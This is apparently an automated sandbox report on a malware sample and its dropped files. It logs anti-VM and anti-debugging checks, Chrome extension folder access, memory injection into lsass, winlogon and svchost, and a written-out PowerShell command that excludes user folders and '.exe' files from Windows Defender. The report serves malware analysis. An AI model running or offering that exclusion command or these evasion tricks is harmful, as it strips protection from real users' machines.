Source: C:\Windows\System32\svchost.exe TID: 2200	Thread sleep count: 33 > 30
Source: C:\Windows\System32\svchost.exe TID: 2200	Thread sleep time: -33000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8188	Thread sleep count: 33 > 30
Source: C:\Windows\System32\svchost.exe TID: 8188	Thread sleep time: -33000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2132	Thread sleep count: 33 > 30
Source: C:\Windows\System32\svchost.exe TID: 2132	Thread sleep time: -33000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5164	Thread sleep count: 32 > 30
Source: C:\Windows\System32\svchost.exe TID: 5164	Thread sleep time: -32000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7520	Thread sleep count: 31 > 30
Source: C:\Windows\System32\svchost.exe TID: 7520	Thread sleep time: -31000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Last function: Thread delayed
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Users\user\DocumentsHDGDGHCAAK.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6DEBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6C6DEBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1997434741.00000000005A2000.00000040.00000001.01000000.00000003.sdmp, DocumentsHDGDGHCAAK.exe, 00000009.00000002.2024809930.000000000087A000.00000080.00000001.01000000.0000000B.sdmp, DocumentsHDGDGHCAAK.exe, 00000009.00000000.1950499949.00000000006EB000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000002.2065068952.00000000009AA000.00000080.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000A.00000000.1983191118.000000000081B000.00000080.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000B.00000002.2077455906.00000000009AA000.00000080.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000B.00000000.1997700649.000000000081B000.00000080.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000C.00000002.2934159241.00000000009AA000.00000080.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000C.00000000.2318149940.000000000081B000.00000080.00000001.01000000.0000000E.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: lsass.exe, 00000035.00000000.2533434102.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 0000003E.00000003.2800245548.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: file.exe, 00000000.00000002.1998156221.00000000015DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware;
Source: svchost.exe, 0000003C.00000002.2939230834.000001845AC2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 0000003E.00000003.2800245548.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 0000003E.00000003.2800245548.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2527950704.000002164EC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2530674023.000002165425B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000C.00000002.2950396161.0000000001439000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000C.00000002.2950396161.0000000001469000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000003E.00000003.2794990505.000001D559395000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: dwm.exe, 00000037.00000002.2969085108.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: svchost.exe, 0000003E.00000003.2794990505.000001D5593A4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 0000003E.00000003.2800245548.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: file.exe, 00000000.00000002.1998156221.0000000001623000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000003E.00000003.2802410794.000001D559C7F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 0000003E.00000000.2586874553.000001D559386000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: svchost.exe, 0000003E.00000002.2970742962.000001D559F12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: lsass.exe, 00000035.00000002.2938986840.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533192367.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000000.2541132756.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.2935857544.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000039.00000002.2933420466.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000039.00000000.2566965125.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003A.00000002.2933420347.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003A.00000000.2568226438.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003C.00000002.2939611958.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003C.00000000.2573360661.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003E.00000002.2938266399.000001D55862B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 0000003E.00000000.2592468550.000001D559E85000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: svchost.exe, 00000036.00000002.2936267981.000002A66062A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: lsass.exe, 00000035.00000000.2533434102.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 0000003E.00000002.2970742962.000001D559F12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 0000003E.00000003.2800245548.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: DocumentsHDGDGHCAAK.exe, 00000009.00000002.2024809930.000000000087A000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000002.2065068952.00000000009AA000.00000080.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000B.00000002.2077455906.00000000009AA000.00000080.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000C.00000002.2934159241.00000000009AA000.00000080.00000001.01000000.0000000E.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driver
Source: skotes.exe, 0000000C.00000002.2950396161.00000000014A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: svchost.exe, 0000003E.00000002.2938266399.000001D55862B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: svchost.exe, 0000003E.00000000.2586874553.000001D559386000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: lsass.exe, 00000035.00000003.2922816943.00000202C037D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: svchost.exe, 0000003E.00000002.2970742962.000001D559F12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 0000003E.00000003.2800245548.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 0000003E.00000000.2585183948.000001D558643000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmcitpA
Source: file.exe, 00000000.00000002.1998156221.00000000015DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: svchost.exe, 00000036.00000002.2938263641.000002A660664000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 0000003A.00000000.2568136314.000002295CE00000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000035.00000000.2533434102.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 0000003E.00000000.2586519842.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: dowvmci
Source: svchost.exe, 0000003E.00000002.2948183713.000001D559020000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware
Source: svchost.exe, 0000003E.00000003.2800434031.000001D5599A5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: file.exe, 00000000.00000002.1997434741.00000000005A2000.00000040.00000001.01000000.00000003.sdmp, DocumentsHDGDGHCAAK.exe, 00000009.00000000.1950499949.00000000006EB000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000000.1983191118.000000000081B000.00000080.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000B.00000000.1997700649.000000000081B000.00000080.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000C.00000000.2318149940.000000000081B000.00000080.00000001.01000000.0000000E.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: svchost.exe, 0000003E.00000002.2970742962.000001D559F12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 0000003E.00000002.2970742962.000001D559F12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 00000037.00000002.2969085108.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 0000003E.00000002.2970742962.000001D559F12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 12_2_052E01CD Start: 052E0292 End: 052E024B

12_2_052E01CD

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\DocumentsHDGDGHCAAK.exe

Code function: 9_2_04EC0218 rdtsc

9_2_04EC0218

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C7AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C7AAC62

Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Code function: 9_2_006B652B mov eax, dword ptr fs:[00000030h]	9_2_006B652B
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Code function: 9_2_006BA302 mov eax, dword ptr fs:[00000030h]	9_2_006BA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_007EA302 mov eax, dword ptr fs:[00000030h]	10_2_007EA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_007E652B mov eax, dword ptr fs:[00000030h]	10_2_007E652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_007EA302 mov eax, dword ptr fs:[00000030h]	11_2_007EA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_007E652B mov eax, dword ptr fs:[00000030h]	11_2_007E652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007EA302 mov eax, dword ptr fs:[00000030h]	12_2_007EA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007E652B mov eax, dword ptr fs:[00000030h]	12_2_007E652B

Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C7AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C7AAC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7312, type: MEMORYSTR

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force			Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAED90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D2A4160000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B5645B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
